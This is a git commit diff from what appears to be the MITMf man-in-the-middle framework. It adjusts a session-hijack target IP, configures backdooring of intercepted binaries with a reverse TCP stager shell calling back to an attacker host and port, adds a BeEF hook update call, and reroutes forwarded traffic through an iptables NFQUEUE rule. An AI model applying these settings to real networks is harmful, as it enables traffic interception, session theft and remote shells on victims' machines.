Fixed IPtables for APF Mode

Added a new banner
This commit is contained in:
byt3bl33d3r 2015-09-14 20:25:06 +02:00
parent 16b774248d
commit 589e45b64f
5 changed files with 26 additions and 7 deletions

View file

@ -79,7 +79,7 @@
[Replace] [Replace]
[[Regex1]] [[Regex1]]
'Google Search' = 'Google yssas' 'Google Search' = '44CON'
[[Regex2]] [[Regex2]]
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants" "I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
@ -89,7 +89,7 @@
# Here you can specify the client to hijack sessions from # Here you can specify the client to hijack sessions from
# #
Client = '192.168.1.26' Client = '10.0.237.91'
[SSLstrip+] [SSLstrip+]
@ -445,10 +445,10 @@
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke # PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
PATCH_METHOD = automatic PATCH_METHOD = automatic
HOST = 192.168.1.16 HOST = 192.168.20.79
PORT = 8090 PORT = 8090
# SHELL for use with automatic PATCH_METHOD # SHELL for use with automatic PATCH_METHOD
SHELL = iat_reverse_tcp_inline_threaded SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload # SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None SUPPLIED_SHELLCODE = None
ZERO_CERT = True ZERO_CERT = True

View file

@ -65,6 +65,19 @@ banner4 = """
""" """
banner5 = """
@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@
@@! @@! @@! @@! @@! @@! @@! @@! @@!
!@! !@! !@! !@! !@! !@! !@! !@! !@!
@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:!
!@! ! !@! !!! !!! !@! ! !@! !!!!!:
!!: !!: !!: !!: !!: !!: !!:
:!: :!: :!: :!: :!: :!: :!:
::: :: :: :: ::: :: ::
: : : : : : :
"""
def get_banner(): def get_banner():
banners = [banner1, banner2, banner3, banner4] banners = [banner1, banner2, banner3, banner4, banner5]
return random.choice(banners) return random.choice(banners)

View file

@ -342,6 +342,12 @@ class Session(object):
logs.append(Log(log)) logs.append(Log(log))
return logs return logs
def update(self, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
r = requests.post("{}/hooks/update/{}?token={}".format(self.url, self.session, self.token), headers=headers, data=payload)
return r.json()
def run(self, module_id, options={}): def run(self, module_id, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"} headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options) payload = json.dumps(options)

View file

@ -17,7 +17,7 @@ class PacketFilter:
iptables().NFQUEUE() iptables().NFQUEUE()
self.nfqueue = NetfilterQueue() self.nfqueue = NetfilterQueue()
self.nfqueue.bind(1, self.modify) self.nfqueue.bind(0, self.modify)
self.nfqueue.run() self.nfqueue.run()

View file

@ -98,5 +98,5 @@ class iptables:
def NFQUEUE(self): def NFQUEUE(self):
log.debug("Setting iptables NFQUEUE rule") log.debug("Setting iptables NFQUEUE rule")
os.system('iptables -t nat -A PREROUTING -j NFQUEUE --queue-num 1') os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0')
self.nfqueue = True self.nfqueue = True